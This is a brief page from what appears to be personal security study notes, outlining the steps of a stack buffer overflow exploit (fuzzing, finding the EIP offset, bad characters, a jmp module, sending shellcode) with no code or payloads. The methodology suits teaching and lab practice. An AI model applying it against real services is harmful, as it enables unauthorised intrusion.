Buffer Overflow

The information in this section is a culmination from John Hammon, Try Hack Me, Tib3rius, SecurityTube DoStackBufferOverflowGood, and Corelan. All links can be found in the Resource section. This section will focus mostly on process and tools.

Basic Process

Enumerate Services
Fuzzing
Finding the Offset
Overwriting the EIP
Finding the Bad Characters
Finding the Right Module
Gain Access

In all actuallity, all of these steps require multiple substeps. This seems like a simple and quick process but can be very time consuming on anything but the simplest buffer overflow

Enumerate Services

Find a running service that recieves an input that may be vulnerable to a buffer overflow.

Fuzzing

Send a bunch of characters to a command or function to see if it crashes the program. You can use the set of SPIKE programs to accomplish this.

Finding the Offset

Figure out at what point the EIP is overwritten in stream of data sent to the program.

Overwriting the EIP

Once you get the offset you can intentionally overwrite the EIP to verify you can control it.

Find the Bad Characters

Send the input all hex characters to see if there are any characters that the program does not handle as expected. Usually, '\x00' is one bad character.

Finding the Right Module

You will need to find a module that is called by the program that you can use a jmp call to a section of memory you control

Gain Access

Set up the shell code and send it to the program.

Resources

https://github.com/joshua17sc/Buffer-Overflows

PreviousDocker Nextwin32

Last updated 3 years ago

Was this helpful?